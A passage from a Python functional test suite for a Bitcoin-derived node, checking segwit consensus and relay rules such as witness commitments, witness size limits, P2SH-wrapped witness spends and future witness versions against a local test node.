tx.vout.append(CTxOut(8000, script_pubkey)) # Might burn this later
tx.vin[0].nSequence = BIP125_SEQUENCE_NUMBER # Just to have the option to bump this tx from the mempool
tx.rehash()
# This is always accepted, since the mempool policy is to consider segwit as always active
# and thus allow segwit outputs
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=True)
# Now create something that looks like a P2PKH output. This won't be spendable.
witness_hash = sha256(witness_program)
script_pubkey = CScript([OP_0, hash160(witness_hash)])
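# (A v0 program with a 20-byte push is interpreted as P2WPKH per
# BIP 141, so this commits to hash160(sha256(script)); no known key
# hashes to that value, which is what makes the output unspendable.)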
tx2 = CTransaction()
# tx was accepted, so we spend the second output.
tx2.vin = [CTxIn(COutPoint(tx.sha256, 1), b"")]
tx2.vout = [CTxOut(7000, script_pubkey)]
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx2, with_witness=True, accepted=True)
# Now update self.utxo for later tests.
tx3 = CTransaction()
# tx and tx2 were both accepted. Don't bother trying to reclaim the
# P2PKH output; just send tx's first output back to an anyone-can-spend.
self.sync_mempools([self.nodes[0], self.nodes[1]])
tx3.vin = [CTxIn(COutPoint(tx.sha256, 0), b"")]
tx3.vout = [CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))]
tx3.wit.vtxinwit.append(CTxInWitness())
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx3.rehash()
if not self.segwit_active:
# Just check mempool acceptance, but don't add the transaction to the mempool, since witness is disallowed
# in blocks and the tx is impossible to mine right now.
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00001000'),
},
}],
)
# Create the same output as tx3, but by replacing the in-mempool tx:
# same input, new output, higher fee (a BIP 125 replacement).
tx3_out = tx3.vout[0]
tx3 = tx
tx3.vout = [tx3_out]
tx3.rehash()
assert_equal(
self.nodes[0].testmempoolaccept([tx3.serialize_with_witness().hex()]),
[{
'txid': tx3.hash,
'wtxid': tx3.getwtxid(),
'allowed': True,
'vsize': tx3.get_vsize(),
'fees': {
'base': Decimal('0.00011000'),
},
}],
)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.nodes[0].generate(1)
self.sync_blocks()
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
assert_equal(len(self.nodes[1].getrawmempool()), 0)
@subtest # type: ignore
def advance_to_segwit_active(self):
"""Mine enough blocks to activate segwit."""
assert not softfork_active(self.nodes[0], 'segwit')
height = self.nodes[0].getblockcount()
self.nodes[0].generate(SEGWIT_HEIGHT - height - 2)
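# The tip is now at height SEGWIT_HEIGHT - 2, so segwit is still
# inactive; the next block brings the tip to SEGWIT_HEIGHT - 1, after
# which the rules apply to newly mined blocks.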
assert not softfork_active(self.nodes[0], 'segwit')
self.nodes[0].generate(1)
assert softfork_active(self.nodes[0], 'segwit')
self.segwit_active = True
@subtest # type: ignore
def test_p2sh_witness(self):
"""Test P2SH wrapped witness programs."""
# Prepare the p2sh-wrapped witness output
witness_program = CScript([OP_DROP, OP_TRUE])
p2wsh_pubkey = script_to_p2wsh_script(witness_program)
script_pubkey = script_to_p2sh_script(p2wsh_pubkey)
script_sig = CScript([p2wsh_pubkey]) # a push of the redeem script
# Fund the P2SH output
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# Verify mempool acceptance and block validity
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True, with_witness=True)
self.sync_blocks()
# Now test attempts to spend the output.
spend_tx = CTransaction()
spend_tx.vin.append(CTxIn(COutPoint(tx.sha256, 0), script_sig))
spend_tx.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
spend_tx.rehash()
# This transaction should not be accepted into the mempool pre- or
# post-segwit. Mempool acceptance will use SCRIPT_VERIFY_WITNESS which
# will require a witness to spend a witness program regardless of
# segwit activation. Note that older versions of ocvcoind that are
# not segwit-aware would also reject this for failing CLEANSTACK.
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: non-mandatory-script-verify-flag (Witness program was passed an empty witness)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Try to put the witness script in the scriptSig, should also fail.
spend_tx.vin[0].scriptSig = CScript([p2wsh_pubkey, b'a'])
spend_tx.rehash()
with self.nodes[0].assert_debug_log(
expected_msgs=(spend_tx.hash, 'was not accepted: mandatory-script-verify-flag-failed (Script evaluated without error but finished with a false/empty top stack element)')):
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=False, accepted=False)
# Now put the witness script in the witness, should succeed after
# segwit activates.
spend_tx.vin[0].scriptSig = script_sig
spend_tx.rehash()
spend_tx.wit.vtxinwit.append(CTxInWitness())
spend_tx.wit.vtxinwit[0].scriptWitness.stack = [b'a', witness_program]
# Verify mempool acceptance
test_transaction_acceptance(self.nodes[0], self.test_node, spend_tx, with_witness=True, accepted=True)
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [spend_tx])
# If we're after activation, then sending this with witnesses should be valid.
# This no longer works before activation, because SCRIPT_VERIFY_WITNESS
# is always set.
# TODO: rewrite this test to make clear that it only works after activation.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update self.utxo
self.utxo.pop(0)
self.utxo.append(UTXO(spend_tx.sha256, 0, spend_tx.vout[0].nValue))
@subtest # type: ignore
def test_witness_commitments(self):
"""Test witness commitments.
This test can only be run after segwit has activated."""
# First try a correct witness commitment.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Test the test -- witness serialization should be different
assert msg_block(block).serialize() != msg_no_witness_block(block).serialize()
# This empty block should be valid.
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try to tweak the nonce
block_2 = self.build_next_block()
add_witness_commitment(block_2, nonce=28)
block_2.solve()
# The commitment should have changed!
assert block_2.vtx[0].vout[-1] != block.vtx[0].vout[-1]
# This should also be valid.
test_witness_block(self.nodes[0], self.test_node, block_2, accepted=True)
# Now test commitments with actual transactions
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
# Let's construct a witness program
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
# tx2 will spend tx1, and send back to a regular anyone-can-spend address
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
tx2.rehash()
block_3 = self.build_next_block()
self.update_witness_block_with_transactions(block_3, [tx, tx2], nonce=1)
# Add an extra OP_RETURN output that matches the witness commitment template,
# even though it has extra data after the incorrect commitment.
# This block should fail.
block_3.vtx[0].vout.append(CTxOut(0, CScript([OP_RETURN, WITNESS_COMMITMENT_HEADER + ser_uint256(2), 10])))
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=False)
# Add a different commitment with different nonce, but in the
# right location, and with some funds burned(!).
# This should succeed (nValue shouldn't affect finding the
# witness commitment).
add_witness_commitment(block_3, nonce=0)
block_3.vtx[0].vout[0].nValue -= 1
block_3.vtx[0].vout[-1].nValue += 1
block_3.vtx[0].rehash()
block_3.hashMerkleRoot = block_3.calc_merkle_root()
block_3.rehash()
assert len(block_3.vtx[0].vout) == 4  # the original output plus 3 OP_RETURNs
block_3.solve()
test_witness_block(self.nodes[0], self.test_node, block_3, accepted=True)
# Finally test that a block with no witness transactions can
# omit the commitment.
block_4 = self.build_next_block()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.vout.append(CTxOut(tx.vout[0].nValue - 1000, witness_program))
tx3.rehash()
block_4.vtx.append(tx3)
block_4.hashMerkleRoot = block_4.calc_merkle_root()
block_4.solve()
test_witness_block(self.nodes[0], self.test_node, block_4, with_witness=False, accepted=True)
# Update available utxo's for use in later test.
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_block_malleability(self):
# Make sure that a block that has too big a virtual size
# because of a too-large coinbase witness is not permanently
# marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.append(b'a' * 5000000)
assert get_virtual_size(block) > MAX_BLOCK_BASE_SIZE
# We can't send over the p2p network, because this is too big to relay
# TODO: repeat this test with a block that can be relayed
assert_equal('bad-witness-nonce-size', self.nodes[0].submitblock(block.serialize().hex()))
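# (BIP 141 requires the coinbase witness to be exactly one 32-byte
# element -- the witness reserved value -- so the oversized extra
# element triggers bad-witness-nonce-size.)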
assert self.nodes[0].getbestblockhash() != block.hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack.pop()
assert get_virtual_size(block) < MAX_BLOCK_BASE_SIZE
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() == block.hash
# Now make sure that malleating the witness reserved value doesn't
# result in a block permanently marked bad.
block = self.build_next_block()
add_witness_commitment(block)
block.solve()
# Change the nonce -- should not cause the block to be permanently
# failed
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(1)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
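# (The commitment in the coinbase output was computed over a zero
# reserved value, so the mismatched value fails validation; and since
# witness data is not covered by the txid, the block hash is unchanged
# and the block must not be cached as permanently invalid.)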
# Changing the witness reserved value doesn't change the block hash
block.vtx[0].wit.vtxinwit[0].scriptWitness.stack = [ser_uint256(0)]
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
@subtest # type: ignore
def test_witness_block_size(self):
# TODO: Test that non-witness carrying blocks can't exceed 1MB
# Skipping this test for now; this is covered in p2p-fullblocktest.py
# Test that witness-bearing blocks are limited at ceil(base + wit/4) <= 1MB.
block = self.build_next_block()
assert len(self.utxo) > 0
# Create a P2WSH transaction.
# The witness program will be a bunch of OP_2DROP's, followed by OP_TRUE.
# This should give us plenty of room to tweak the spending tx's
# virtual size.
NUM_DROPS = 200 # 201 max ops per script!
NUM_OUTPUTS = 50
witness_program = CScript([OP_2DROP] * NUM_DROPS + [OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
prevout = COutPoint(self.utxo[0].sha256, self.utxo[0].n)
value = self.utxo[0].nValue
parent_tx = CTransaction()
parent_tx.vin.append(CTxIn(prevout, b""))
child_value = value // NUM_OUTPUTS
for _ in range(NUM_OUTPUTS):
parent_tx.vout.append(CTxOut(child_value, script_pubkey))
parent_tx.vout[0].nValue -= 50000
assert parent_tx.vout[0].nValue > 0
parent_tx.rehash()
child_tx = CTransaction()
for i in range(NUM_OUTPUTS):
child_tx.vin.append(CTxIn(COutPoint(parent_tx.sha256, i), b""))
child_tx.vout = [CTxOut(value - 100000, CScript([OP_TRUE]))]
for _ in range(NUM_OUTPUTS):
child_tx.wit.vtxinwit.append(CTxInWitness())
child_tx.wit.vtxinwit[-1].scriptWitness.stack = [b'a' * 195] * (2 * NUM_DROPS) + [witness_program]
child_tx.rehash()
self.update_witness_block_with_transactions(block, [parent_tx, child_tx])
vsize = get_virtual_size(block)
additional_bytes = (MAX_BLOCK_BASE_SIZE - vsize) * 4
i = 0
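# Each witness byte adds one weight unit (a quarter vbyte), so we add
# 4x the vbyte shortfall in witness bytes; the "+ 1" below overshoots
# so the rounded-up vsize lands exactly one vbyte over the limit.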
while additional_bytes > 0:
# Add some more bytes to each input until we hit MAX_BLOCK_BASE_SIZE+1
extra_bytes = min(additional_bytes + 1, 55)
block.vtx[-1].wit.vtxinwit[int(i / (2 * NUM_DROPS))].scriptWitness.stack[i % (2 * NUM_DROPS)] = b'a' * (195 + extra_bytes)
additional_bytes -= extra_bytes
i += 1
block.vtx[0].vout.pop() # Remove old commitment
add_witness_commitment(block)
block.solve()
vsize = get_virtual_size(block)
assert_equal(vsize, MAX_BLOCK_BASE_SIZE + 1)
# Make sure that our test case would exceed the old max-network-message
# limit
assert len(block.serialize()) > 2 * 1024 * 1024
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now resize the second transaction to make the block fit.
cur_length = len(block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0])
block.vtx[-1].wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (cur_length - 1)
block.vtx[0].vout.pop()
add_witness_commitment(block)
block.solve()
assert get_virtual_size(block) == MAX_BLOCK_BASE_SIZE
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update available utxo's
self.utxo.pop(0)
self.utxo.append(UTXO(block.vtx[-1].sha256, 0, block.vtx[-1].vout[0].nValue))
@subtest # type: ignore
def test_submit_block(self):
"""Test that submitblock adds the nonce automatically when possible."""
block = self.build_next_block()
# Try using a custom nonce and then don't supply it.
# This can't work: submitblock only fills in the default (zero) nonce,
# so the commitment will not match.
add_witness_commitment(block, nonce=1)
block.vtx[0].wit = CTxWitness() # drop the nonce
block.solve()
assert_equal('bad-witness-merkle-match', self.nodes[0].submitblock(block.serialize().hex()))
assert self.nodes[0].getbestblockhash() != block.hash
# Now redo commitment with the standard nonce, but let ocvcoind fill it in.
add_witness_commitment(block, nonce=0)
block.vtx[0].wit = CTxWitness()
block.solve()
assert_equal(None, self.nodes[0].submitblock(block.serialize().hex()))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
# This time, add a tx with non-empty witness, but don't supply
# the commitment.
block_2 = self.build_next_block()
add_witness_commitment(block_2)
block_2.solve()
# Drop commitment and nonce -- submitblock should not fill them in.
block_2.vtx[0].vout.pop()
block_2.vtx[0].wit = CTxWitness()
assert_equal('bad-txnmrklroot', self.nodes[0].submitblock(block_2.serialize().hex()))
# Tip should not advance!
assert self.nodes[0].getbestblockhash() != block_2.hash
@subtest # type: ignore
def test_extra_witness_data(self):
"""Test extra witness data in a transaction."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# First try extra witness data on a tx that doesn't require a witness
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 2000, script_pubkey))
tx.vout.append(CTxOut(1000, CScript([OP_TRUE]))) # non-witness output
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [CScript([])]
tx.rehash()
self.update_witness_block_with_transactions(block, [tx])
# Extra witness data should not be allowed.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try extra signature data. Ok if we're not spending a witness output.
block.vtx[1].wit.vtxinwit = []
block.vtx[1].vin[0].scriptSig = CScript([OP_0])
block.vtx[1].rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Now try extra witness/signature data on an input that DOES require a
# witness
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b"")) # witness output
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 1), b"")) # non-witness
tx2.vout.append(CTxOut(tx.vout[0].nValue, CScript([OP_TRUE])))
tx2.wit.vtxinwit.extend([CTxInWitness(), CTxInWitness()])
tx2.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), CScript([CScriptNum(1)]), witness_program]
tx2.wit.vtxinwit[1].scriptWitness.stack = [CScript([OP_TRUE])]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
# This has extra witness data, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra witness, but add extra scriptSig data
tx2.vin[0].scriptSig = CScript([OP_TRUE])
tx2.vin[1].scriptSig = CScript([OP_TRUE])
tx2.wit.vtxinwit[0].scriptWitness.stack.pop(0)
tx2.wit.vtxinwit[1].scriptWitness.stack = []
tx2.rehash()
add_witness_commitment(block)
block.solve()
# This has extra signature data for a witness input, so it should fail.
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now get rid of the extra scriptsig on the witness input, and verify
# success (even with extra scriptsig data in the non-witness input)
tx2.vin[0].scriptSig = b""
tx2.rehash()
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update utxo for later tests
self.utxo.pop(0)
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_push_length(self):
"""Test that witness stack can only allow up to 520 byte pushes."""
block = self.build_next_block()
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
# First try a 521-byte stack element
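# (MAX_SCRIPT_ELEMENT_SIZE is 520 bytes; BIP 141 applies the same
# push-size limit to every P2WSH witness stack element.)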
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a' * (MAX_SCRIPT_ELEMENT_SIZE + 1), witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now reduce the length of the stack element
tx2.wit.vtxinwit[0].scriptWitness.stack[0] = b'a' * (MAX_SCRIPT_ELEMENT_SIZE)
add_witness_commitment(block)
block.solve()
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Update the utxo for later tests
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_max_witness_program_length(self):
"""Test that witness outputs greater than 10kB can't be spent."""
MAX_PROGRAM_LENGTH = 10000
# This program is 19 max pushes (9937 bytes), then 64 more opcode-bytes.
long_witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 63 + [OP_TRUE])
assert len(long_witness_program) == MAX_PROGRAM_LENGTH + 1
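# (Arithmetic: each 520-byte push costs OP_PUSHDATA2 plus a 2-byte
# length, so 19 * (3 + 520) = 9937 bytes; 63 OP_DROPs and an OP_TRUE
# add 64 opcode-bytes, for 10001 bytes total.)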
long_script_pubkey = script_to_p2wsh_script(long_witness_program)
block = self.build_next_block()
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, long_script_pubkey))
tx.rehash()
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx.sha256, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, CScript([OP_TRUE])))
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 44 + [long_witness_program]
tx2.rehash()
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Try again with one less byte in the witness program
witness_program = CScript([b'a' * MAX_SCRIPT_ELEMENT_SIZE] * 19 + [OP_DROP] * 62 + [OP_TRUE])
assert len(witness_program) == MAX_PROGRAM_LENGTH
script_pubkey = script_to_p2wsh_script(witness_program)
tx.vout[0] = CTxOut(tx.vout[0].nValue, script_pubkey)
tx.rehash()
tx2.vin[0].prevout.hash = tx.sha256
tx2.wit.vtxinwit[0].scriptWitness.stack = [b'a'] * 43 + [witness_program]
tx2.rehash()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx, tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_witness_input_length(self):
"""Test that vin length must match vtxinwit length."""
witness_program = CScript([OP_DROP, OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
# Create a transaction that splits our utxo into many outputs
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
value = self.utxo[0].nValue
for _ in range(10):
tx.vout.append(CTxOut(value // 10, script_pubkey))
tx.vout[0].nValue -= 1000
assert tx.vout[0].nValue >= 0
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
# Try various ways to spend tx that should all break.
# This "broken" transaction serializer will not normalize
# the length of vtxinwit.
class BrokenCTransaction(CTransaction):
def serialize_with_witness(self):
flags = 0
if not self.wit.is_null():
flags |= 1
r = b""
r += struct.pack("<i", self.nVersion)
if flags:
dummy = []
r += ser_vector(dummy)
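# (the empty vector above serializes to a single 0x00 byte, which
# doubles as the BIP 144 segwit marker; the flags byte comes next)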
r += struct.pack("<B", flags)
r += ser_vector(self.vin)
r += ser_vector(self.vout)
if flags & 1:
r += self.wit.serialize()
r += struct.pack("<I", self.nLockTime)
return r
tx2 = BrokenCTransaction()
for i in range(10):
tx2.vin.append(CTxIn(COutPoint(tx.sha256, i), b""))
tx2.vout.append(CTxOut(value - 3000, CScript([OP_TRUE])))
# First try using a too long vtxinwit
for i in range(11):
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[i].scriptWitness.stack = [b'a', witness_program]
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now try using a too short vtxinwit
tx2.wit.vtxinwit.pop()
tx2.wit.vtxinwit.pop()
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Now make one of the intermediate witnesses be incorrect
tx2.wit.vtxinwit.append(CTxInWitness())
tx2.wit.vtxinwit[-1].scriptWitness.stack = [b'a', witness_program]
tx2.wit.vtxinwit[5].scriptWitness.stack = [witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=False)
# Fix the broken witness and the block should be accepted.
tx2.wit.vtxinwit[5].scriptWitness.stack = [b'a', witness_program]
block.vtx = [block.vtx[0]]
self.update_witness_block_with_transactions(block, [tx2])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop()
self.utxo.append(UTXO(tx2.sha256, 0, tx2.vout[0].nValue))
@subtest # type: ignore
def test_tx_relay_after_segwit_activation(self):
"""Test transaction relay after segwit activation.
After segwit activates, verify that mempool:
- rejects transactions with unnecessary/extra witnesses
- accepts transactions with valid witnesses
and that witness transactions are relayed to non-upgraded peers."""
# Generate a transaction that doesn't require a witness, but send it
# with a witness. Should be rejected because we can't use a witness
# when spending a non-witness output.
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
tx.vout.append(CTxOut(self.utxo[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE])))
tx.wit.vtxinwit.append(CTxInWitness())
tx.wit.vtxinwit[0].scriptWitness.stack = [b'a']
tx.rehash()
tx_hash = tx.sha256
# Verify that unnecessary witnesses are rejected.
self.test_node.announce_tx_and_wait_for_getdata(tx)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=False)
# Verify that removing the witness succeeds.
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=False, accepted=True)
# Now try to add extra witness data to a valid witness tx.
witness_program = CScript([OP_TRUE])
script_pubkey = script_to_p2wsh_script(witness_program)
tx2 = CTransaction()
tx2.vin.append(CTxIn(COutPoint(tx_hash, 0), b""))
tx2.vout.append(CTxOut(tx.vout[0].nValue - 1000, script_pubkey))
tx2.rehash()
tx3 = CTransaction()
tx3.vin.append(CTxIn(COutPoint(tx2.sha256, 0), b""))
tx3.wit.vtxinwit.append(CTxInWitness())
# Add a witness that is too large for IsStandard and check that it does not enter the reject filter
p2sh_program = CScript([OP_TRUE])
witness_program2 = CScript([b'a' * 400000])
tx3.vout.append(CTxOut(tx2.vout[0].nValue - 1000, script_to_p2sh_script(p2sh_program)))
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program2]
tx3.rehash()
# The node will not be blinded to the transaction: it will request it
# any number of times when it is announced via txid relay. It will be
# blinded to the transaction via wtxid relay, however.
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True)
test_transaction_acceptance(self.nodes[1], self.std_node, tx3, True, False, 'tx-size')
self.std_node.announce_tx_and_wait_for_getdata(tx3)
self.std_wtx_node.announce_tx_and_wait_for_getdata(tx3, use_wtxid=True, success=False)
# Remove witness stuffing, instead add extra witness push on stack
tx3.vout[0] = CTxOut(tx2.vout[0].nValue - 1000, CScript([OP_TRUE, OP_DROP] * 15 + [OP_TRUE]))
tx3.wit.vtxinwit[0].scriptWitness.stack = [CScript([CScriptNum(1)]), witness_program]
tx3.rehash()
test_transaction_acceptance(self.nodes[0], self.test_node, tx2, with_witness=True, accepted=True)
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=False)
# Get rid of the extra witness, and verify acceptance.
tx3.wit.vtxinwit[0].scriptWitness.stack = [witness_program]
# Also check that old_node gets a tx announcement, even though this is
# a witness transaction.
self.old_node.wait_for_inv([CInv(MSG_TX, tx2.sha256)]) # wait until tx2 was inv'ed
test_transaction_acceptance(self.nodes[0], self.test_node, tx3, with_witness=True, accepted=True)
self.old_node.wait_for_inv([CInv(MSG_TX, tx3.sha256)])
# Test that getrawtransaction returns correct witness information
# hash, size, vsize
raw_tx = self.nodes[0].getrawtransaction(tx3.hash, 1)
assert_equal(int(raw_tx["hash"], 16), tx3.calc_sha256(True))
assert_equal(raw_tx["size"], len(tx3.serialize_with_witness()))
weight = len(tx3.serialize_with_witness()) + 3 * len(tx3.serialize_without_witness())
vsize = math.ceil(weight / 4)
assert_equal(raw_tx["vsize"], vsize)
assert_equal(raw_tx["weight"], weight)
assert_equal(len(raw_tx["vin"][0]["txinwitness"]), 1)
assert_equal(raw_tx["vin"][0]["txinwitness"][0], witness_program.hex())
assert vsize != raw_tx["size"]
# Cleanup: mine the transactions and update utxo for next test
self.nodes[0].generate(1)
assert_equal(len(self.nodes[0].getrawmempool()), 0)
self.utxo.pop(0)
self.utxo.append(UTXO(tx3.sha256, 0, tx3.vout[0].nValue))
@subtest # type: ignore
def test_segwit_versions(self):
"""Test validity of future segwit version transactions.
Future segwit versions are non-standard to spend, but valid in blocks.
Sending to future segwit versions is always allowed.
Can run this before and after segwit activation."""
NUM_SEGWIT_VERSIONS = 17  # will test OP_0, OP_1, ..., OP_16
if len(self.utxo) < NUM_SEGWIT_VERSIONS:
tx = CTransaction()
tx.vin.append(CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b""))
split_value = (self.utxo[0].nValue - 4000) // NUM_SEGWIT_VERSIONS
for _ in range(NUM_SEGWIT_VERSIONS):
tx.vout.append(CTxOut(split_value, CScript([OP_TRUE])))
tx.rehash()
block = self.build_next_block()
self.update_witness_block_with_transactions(block, [tx])
test_witness_block(self.nodes[0], self.test_node, block, accepted=True)
self.utxo.pop(0)
for i in range(NUM_SEGWIT_VERSIONS):
self.utxo.append(UTXO(tx.sha256, i, split_value))
self.sync_blocks()
temp_utxo = []
tx = CTransaction()
witness_program = CScript([OP_TRUE])
witness_hash = sha256(witness_program)
assert_equal(len(self.nodes[1].getrawmempool()), 0)
for version in list(range(OP_1, OP_16 + 1)) + [OP_0]:
# First try to spend to a future version segwit script_pubkey.
if version == OP_1:
# Don't use 32-byte v1 witness (used by Taproot; see BIP 341)
script_pubkey = CScript([CScriptOp(version), witness_hash + b'\x00'])
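# (BIP 341 only assigns taproot semantics to 32-byte v1 programs, so
# the extra byte makes this a plain future-version output instead.)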
else:
script_pubkey = CScript([CScriptOp(version), witness_hash])
tx.vin = [CTxIn(COutPoint(self.utxo[0].sha256, self.utxo[0].n), b"")]
tx.vout = [CTxOut(self.utxo[0].nValue - 1000, script_pubkey)]
tx.rehash()
test_transaction_acceptance(self.nodes[1], self.std_node, tx, with_witness=True, accepted=False)
test_transaction_acceptance(self.nodes[0], self.test_node, tx, with_witness=True, accepted=True)
self.utxo.pop(0)
temp_utxo.append(UTXO(tx.sha256, 0, tx.vout[0].nValue))
self.nodes[0].generate(1) # Mine all the transactions
self.sync_blocks()
assert len(self.nodes[0].getrawmempool()) == 0
# Finally, verify that version 0 -> version 2 transactions
# are standard
script_pubkey = CScript([CScriptOp(OP_2), witness_hash])
tx2 = CTransaction()
